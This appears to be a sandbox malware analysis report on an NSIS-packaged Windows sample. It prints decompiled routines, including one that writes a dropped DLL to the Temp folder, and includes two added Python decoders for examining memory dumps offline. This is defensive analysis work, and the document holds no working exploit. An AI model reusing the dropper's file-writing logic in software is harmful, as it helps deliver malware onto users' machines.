                                        • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078E938,00789938), ref: 00405BBA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                        • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 4227507514-3711765563
                                        • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                        • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                        • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                        • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%
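
Added worked example, not code from the report or from the sample: an offline decoder for the two-byte escape scheme in the listing above (prefix byte 0xfd, 0xfe or 0xff, then two bytes combined as `(hi & 0x7f) << 7 | lo & 0x7f`), so strings pulled from a memory dump can be expanded without running the binary. Every numeric constant comes from the listing; reading the routine as NSIS string expansion (the binary carries an "NSIS Error" string), the CSIDL names given to 0x24/0x25/0x26/0x2b, the meaning of the flag at 0x7a3004, the decimal rendering of the window handle and the language-table lookup for the 0xff case are assumptions. The variable table, registry values and shell-folder paths below are constructed for the demo; the validation helper E00405BFB that the listing applies to the result is not reproduced.

```python
# Added example, not code from the report or from the sample: an offline decoder
# for the escape scheme in the listing above, so strings pulled from a memory dump
# can be expanded without running the binary. Numeric constants come from the
# listing; reading them as NSIS string expansion, the CSIDL names, and the meaning
# of the flag at 0x7a3004 are assumptions. The environment below is constructed.

ESC_VAR, ESC_SHELL, ESC_LANG = 0xFD, 0xFE, 0xFF   # the three _a11 values tested
CSIDL_FLAG_CREATE = 0x8000                        # the "| 0x00008000" on both bytes
CSIDL_WINDOWS, CSIDL_SYSTEM = 0x24, 0x25
CSIDL_PROGRAM_FILES, CSIDL_PROGRAM_FILES_COMMON = 0x26, 0x2B
QUICKLAUNCH_MARKER = 4                            # second byte == 4 in the listing
QUICKLAUNCH_SUFFIX = "\\Microsoft\\Internet Explorer\\Quick Launch"
HWND_VAR_INDEX = 0x1B                             # emitted as the parent window handle


def decode_short(lo, hi):
    """Mirror of (_t37 & 0x7f) << 7 | _t69 & 0x7f."""
    return ((hi & 0x7F) << 7) | (lo & 0x7F)


def encode_short(value):
    """Inverse used to build inputs; the high bit of each byte is set so an index
    of 0 does not produce a NUL terminator (assumption suggested by the masks)."""
    return bytes([(value & 0x7F) | 0x80, ((value >> 7) & 0x7F) | 0x80])


def resolve_shell(lo, hi, env):
    """The 0xfe branch: fixed-folder shortcuts first, then the CSIDL lookup loop."""
    suffix = ""
    if hi == QUICKLAUNCH_MARKER:
        suffix = QUICKLAUNCH_SUFFIX
    else:
        val = ""
        if lo == CSIDL_PROGRAM_FILES_COMMON:
            val = env["registry"].get("CommonFilesDir", "")
        elif lo == CSIDL_PROGRAM_FILES:   # hard-coded fallback, so this always returns
            val = env["registry"].get("ProgramFilesDir", "") or "C:\\Program Files"
        elif lo == CSIDL_SYSTEM:
            val = env["sysdir"]
        elif lo == CSIDL_WINDOWS:
            val = env["windir"]
        if val:
            return val
    # SHGetSpecialFolderLocation loop: four table entries walked from the top, or
    # only the first two when the flag at 0x7a3004 is clear. The dict lookup
    # stands in for the SHGetSpecialFolderLocation/SHGetPathFromIDListA pair.
    fldrs = [lo, lo | CSIDL_FLAG_CREATE, hi, hi | CSIDL_FLAG_CREATE]
    out = ""
    for x in range((4 if env["all_user_var"] else 2) - 1, -1, -1):
        out = env["shell_folders"].get(fldrs[x], "")
        if out:
            break
    return out + suffix if out else ""


def expand(data, env):
    """Expand one encoded string; stops at NUL like the original."""
    out, i = [], 0
    while i < len(data) and data[i] != 0:
        c = data[i]
        if c not in (ESC_VAR, ESC_SHELL, ESC_LANG):
            out.append(chr(c))            # literal byte, copied through
            i += 1
            continue
        # The listing reads in[1] and in[2] unconditionally; a dump cut in the
        # middle of an escape is reported instead of being read past its end.
        if i + 2 >= len(data):
            raise ValueError("truncated escape at offset %d" % i)
        lo, hi = data[i + 1], data[i + 2]
        idx = decode_short(lo, hi)
        i += 3
        if c == ESC_SHELL:
            out.append(resolve_shell(lo, hi, env))
        elif c == ESC_VAR:
            if idx == HWND_VAR_INDEX:
                out.append(str(env["hwnd"]))    # decimal rendering is an assumption
            else:
                out.append(env["vars"].get(idx, ""))
        else:
            # (_t38 | 0xffffffff) - _t86 == -1 - idx: a negative offset that the
            # recursive call resolves to language-table entry idx (assumption).
            out.append(expand(env["lang"][idx], env))
    return "".join(out)


# Constructed environment; none of these values are taken from the report.
DEMO_ENV = {
    "registry": {"ProgramFilesDir": "C:\\Program Files", "CommonFilesDir": ""},
    "windir": "C:\\Windows",
    "sysdir": "C:\\Windows\\System32",
    "all_user_var": False,
    "shell_folders": {
        0x1A: "C:\\Users\\analyst\\AppData\\Roaming",
        CSIDL_PROGRAM_FILES_COMMON | CSIDL_FLAG_CREATE: "C:\\Program Files\\Common Files",
    },
    "vars": {21: "C:\\Users\\analyst\\AppData\\Local\\Temp\\nsk0000.tmp"},  # index is arbitrary
    "hwnd": 0x1234,
    "lang": [b"Setup"],
}
```

To use it against a real dump, feed `expand()` the raw bytes of a string-table entry and fill `DEMO_ENV` from the analysis VM (the `CommonFilesDir` and `ProgramFilesDir` values under `Software\Microsoft\Windows\CurrentVersion`, plus the paths the sandbox reports for the CSIDLs the sample touched). The truncation check matters because the original reads two bytes after every escape byte whether or not they exist in the buffer.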

                                        C-Code - Quality: 32%
                                        			E004026FA() {
                                        				void* _t23;
                                        				void* _t28;
                                        				long _t33;
                                        				struct _OVERLAPPED* _t48;
                                        				void* _t51;
                                        				void* _t53;
                                        				void* _t54;
                                        				CHAR* _t55;
                                        				void* _t58;
                                        				void* _t59;
                                        				void* _t60;
                                        
                                        				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
                                        				_t54 = E00402A9A(_t48);
                                        				_t23 = E00405538(_t54);
                                        				_push(_t54);
                                        				if(_t23 == 0) {
                                        					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                        					_t55 = 0x40a018;
                                        				} else {
                                        					_push(0x40a018);
                                        					E004059BF();
                                        				}
                                        				E00405BFB(_t55);
                                        				_t28 = E00405690(_t55, 0x40000000, 2);
                                        				 *(_t60 + 8) = _t28;
                                        				if(_t28 != 0xffffffff) {
                                        					_t33 =  *0x7a2f8c;
                                        					 *(_t60 - 0x2c) = _t33;
                                        					_t53 = GlobalAlloc(0x40, _t33);
                                        					if(_t53 != _t48) {
                                        						E004030FF(_t48);
                                        						E004030CD(_t53,  *(_t60 - 0x2c));
                                        						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
                                        						 *(_t60 - 0x30) = _t58;
                                        						if(_t58 != _t48) {
                                        							_push( *(_t60 - 0x1c));
                                        							_push(_t58);
                                        							_push(_t48);
                                        							_push( *((intOrPtr*)(_t60 - 0x20)));
                                        							E00402EBD();
                                        							while( *_t58 != _t48) {
                                        								_t59 = _t58 + 8;
                                        								 *(_t60 - 0x38) =  *_t58;
                                        								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
                                        								_t58 = _t59 +  *(_t60 - 0x38);
                                        							}
                                        							GlobalFree( *(_t60 - 0x30));
                                        						}
                                        						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
                                        						GlobalFree(_t53);
                                        						_push(_t48);
                                        						_push(_t48);
                                        						_push( *(_t60 + 8));
                                        						_push(0xffffffff);
                                        						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
                                        					}
                                        					CloseHandle( *(_t60 + 8));
                                        					_t55 = 0x40a018;
                                        				}
                                        				_t51 = 0xfffffff3;
                                        				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
                                        					_t51 = 0xffffffef;
                                        					DeleteFileA(_t55);
                                        					 *((intOrPtr*)(_t60 - 4)) = 1;
                                        				}
                                        				_push(_t51);
                                        				E00401428();
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
                                        				return 0;
                                        			}
                                        0x004026fb
                                        0x00402707
                                        0x0040270a
                                        0x00402711
                                        0x00402712
                                        0x00402737
                                        0x0040273c
                                        0x00402714
                                        0x00402719
                                        0x0040271a
                                        0x0040271a
                                        0x00402742
                                        0x0040274f
                                        0x00402757
                                        0x0040275a
                                        0x00402760
                                        0x0040276e
                                        0x00402773
                                        0x00402777
                                        0x0040277a
                                        0x00402783
                                        0x0040278f
                                        0x00402793
                                        0x00402796
                                        0x00402798
                                        0x0040279b
                                        0x0040279c
                                        0x0040279d
                                        0x004027a0
                                        0x004027bf
                                        0x004027ac
                                        0x004027b4
                                        0x004027b7
                                        0x004027bc
                                        0x004027bc
                                        0x004027c6
                                        0x004027c6
                                        0x004027d8
                                        0x004027df
                                        0x004027e5
                                        0x004027e6
                                        0x004027e7
                                        0x004027ea
                                        0x004027f1
                                        0x004027f1
                                        0x004027f7
                                        0x004027fd
                                        0x004027fd
                                        0x00402807
                                        0x00402808
                                        0x0040280c
                                        0x0040280e
                                        0x00402814
                                        0x00402814
                                        0x0040281b
                                        0x004021e8
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                        • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                        • GlobalFree.KERNEL32 ref: 004027C6
                                        • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                        • GlobalFree.KERNEL32 ref: 004027DF
                                        • CloseHandle.KERNEL32(?), ref: 004027F7
                                        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 3508600917-2932325099
                                        • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                        • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                        • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                        • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%
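
Added worked example, not code from the report or from the sample: the record loop in the listing above (`while(*_t58 != 0)`) reads a 4-byte size, a 4-byte offset and then `size` bytes of data, and copies each record into the GlobalAlloc'd image at that offset before the image is written to the .dll path with WriteFile. This re-implementation lets an analyst apply such a decompressed record stream to a header image taken from a dump. The listing copies with no bounds check on the offset or the size; the version here refuses a record that would land outside the image or run past the end of the stream. The record layout is read straight from the listing; the image and stream below are constructed.

```python
# Added example (not code from the report or the sample): the (size, offset, data)
# record loop in the listing above, re-implemented for use on a dumped header image
# and a decompressed record stream. The original copies into the image with no
# bounds check; this version rejects records that fall outside it.

import struct


def iter_patch_records(stream):
    """Yield (offset, data) per record until the 4-byte zero size that ends the stream."""
    pos = 0
    while True:
        if pos + 4 > len(stream):
            raise ValueError("stream ends without a terminator at offset %d" % pos)
        size = struct.unpack_from("<I", stream, pos)[0]
        if size == 0:                       # the listing's *_t58 == 0 exit
            return
        if pos + 8 > len(stream):
            raise ValueError("record at %d has no offset field" % pos)
        offset = struct.unpack_from("<I", stream, pos + 4)[0]
        pos += 8                            # _t59 = _t58 + 8
        if pos + size > len(stream):
            raise ValueError("record at %d claims %d bytes past the end" % (pos - 8, size))
        yield offset, stream[pos:pos + size]
        pos += size                         # _t58 = _t59 + size


def apply_patch_records(image, stream):
    """Return a patched copy of image, checking each write against the image size."""
    buf = bytearray(image)
    for offset, data in iter_patch_records(stream):
        if offset + len(data) > len(buf):   # the check the listing does not make
            raise ValueError("record writes %d bytes at 0x%x, image is 0x%x bytes"
                             % (len(data), offset, len(buf)))
        buf[offset:offset + len(data)] = data
    return bytes(buf)


def build_patch_stream(records):
    """Inverse of iter_patch_records, used here only to construct test input."""
    body = b"".join(struct.pack("<II", len(d), off) + d for off, d in records)
    return body + struct.pack("<I", 0)


# Constructed input: a 32-byte stand-in for the copied header and two records.
DEMO_IMAGE = bytes(32)
DEMO_STREAM = build_patch_stream([(4, b"\xde\xad\xbe\xef"), (28, b"\x01\x02\x03\x04")])
```

When run over data from a real dump, the image is the buffer of `*0x7a2f8c` bytes that the listing allocates first, and the stream is the second allocation after E00402EBD has filled it; a ValueError from `apply_patch_records` then tells you the stream was corrupt or mis-sized rather than silently corrupting heap memory as the original would.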

                                        C-Code - Quality: 94%
                                        			E00404D62(CHAR* _a4, CHAR* _a8) {
                                        				struct HWND__* _v8;
                                        				signed int _v12;
                                        				CHAR* _v32;
                                        				long _v44;
                                        				int _v48;
                                        				void* _v52;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				CHAR* _t26;
                                        				signed int _t27;
                                        				CHAR* _t28;
                                        				long _t29;
                                        				signed int _t39;
                                        
                                        				_t26 =  *0x7a2764;
                                        				_v8 = _t26;
                                        				if(_t26 != 0) {
                                        					_t27 =  *0x4092a0; // 0x6
                                        					_v12 = _t27;
                                        					_t39 = _t27 & 0x00000001;
                                        					if(_t39 == 0) {
                                        						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
                                        					}
                                        					_t26 = lstrlenA(0x79ed60);
                                        					_a4 = _t26;
                                        					if(_a8 == 0) {
                                        						L6:
                                        						if((_v12 & 0x00000004) != 0) {
                                        							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
                                        						}
                                        						if((_v12 & 0x00000002) != 0) {
                                        							_v32 = 0x79ed60;
                                        							_v52 = 1;
                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                        							_v44 = 0;
                                        							_v48 = _t29 - _t39;
                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                        						}
                                        						if(_t39 != 0) {
                                        							_t28 = _a4;
                                        							 *((char*)(_t28 + 0x79ed60)) = 0;
                                        							return _t28;
                                        						}
                                        					} else {
                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                        						if(_t26 < 0x800) {
                                        							_t26 = lstrcatA(0x79ed60, _a8);
                                        							goto L6;
                                        						}
                                        					}
                                        				}
                                        				return _t26;
                                        			}

                                        APIs
                                        • lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                        • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                        • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                        • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: `y
                                        • API String ID: 2531174081-1740403070
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405BFB(CHAR* _a4) {
                                        				char _t5;
                                        				char _t7;
                                        				char* _t15;
                                        				char* _t16;
                                        				CHAR* _t17;
                                        
                                        				_t17 = _a4;
                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                        					_t17 =  &(_t17[4]);
                                        				}
                                        				if( *_t17 != 0 && E00405538(_t17) != 0) {
                                        					_t17 =  &(_t17[2]);
                                        				}
                                        				_t5 =  *_t17;
                                        				_t15 = _t17;
                                        				_t16 = _t17;
                                        				if(_t5 != 0) {
                                        					do {
                                        						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
                                        							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
                                        							_t16 = CharNextA(_t16);
                                        						}
                                        						_t17 = CharNextA(_t17);
                                        						_t5 =  *_t17;
                                        					} while (_t5 != 0);
                                        				}
                                        				 *_t16 =  *_t16 & 0x00000000;
                                        				while(1) {
                                        					_t16 = CharPrevA(_t15, _t16);
                                        					_t7 =  *_t16;
                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                        						break;
                                        					}
                                        					 *_t16 =  *_t16 & 0x00000000;
                                        					if(_t15 < _t16) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				return _t7;
                                        			}

                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                        • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                        • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                        • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                        • *?|<>/":, xrefs: 00405C43
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                        • API String ID: 589700163-562438032
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                        				struct tagLOGBRUSH _v16;
                                        				long _t35;
                                        				long _t37;
                                        				void* _t40;
                                        				long* _t49;
                                        
                                        				if(_a4 + 0xfffffecd > 5) {
                                        					L15:
                                        					return 0;
                                        				}
                                        				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                        				if(_t49 == 0) {
                                        					goto L15;
                                        				}
                                        				_t35 =  *_t49;
                                        				if((_t49[5] & 0x00000002) != 0) {
                                        					_t35 = GetSysColor(_t35);
                                        				}
                                        				if((_t49[5] & 0x00000001) != 0) {
                                        					SetTextColor(_a8, _t35);
                                        				}
                                        				SetBkMode(_a8, _t49[4]);
                                        				_t37 = _t49[1];
                                        				_v16.lbColor = _t37;
                                        				if((_t49[5] & 0x00000008) != 0) {
                                        					_t37 = GetSysColor(_t37);
                                        					_v16.lbColor = _t37;
                                        				}
                                        				if((_t49[5] & 0x00000004) != 0) {
                                        					SetBkColor(_a8, _t37);
                                        				}
                                        				if((_t49[5] & 0x00000010) != 0) {
                                        					_v16.lbStyle = _t49[2];
                                        					_t40 = _t49[3];
                                        					if(_t40 != 0) {
                                        						DeleteObject(_t40);
                                        					}
                                        					_t49[3] = CreateBrushIndirect( &_v16);
                                        				}
                                        				return _t49[3];
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E0040166B() {
                                        				int _t18;
                                        				void* _t28;
                                        				void* _t35;
                                        
                                        				 *(_t35 + 8) = E00402A9A(0xffffffd0);
                                        				 *(_t35 - 8) = E00402A9A(0xffffffdf);
                                        				E004059BF(0x40a018,  *(_t35 + 8));
                                        				_t18 = lstrlenA( *(_t35 - 8));
                                        				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                                        					lstrcatA(0x40a018, 0x40901c);
                                        					lstrcatA(0x40a018,  *(_t35 - 8));
                                        				}
                                        				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                                        					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
                                        						 *((intOrPtr*)(_t35 - 4)) = 1;
                                        					} else {
                                        						E00405707( *(_t35 + 8),  *(_t35 - 8));
                                        						_push(0xffffffe4);
                                        						goto L7;
                                        					}
                                        				} else {
                                        					_push(0xffffffe3);
                                        					L7:
                                        					E00401428();
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
                                        				return 0;
                                        			}

                                        APIs
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 00401690
                                        • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 0040169A
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 004016AF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,?,000000DF,000000D0), ref: 004016B8
                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ), ref: 00405CA2
                                          • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                          • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                          • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                          • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                          • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                          • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
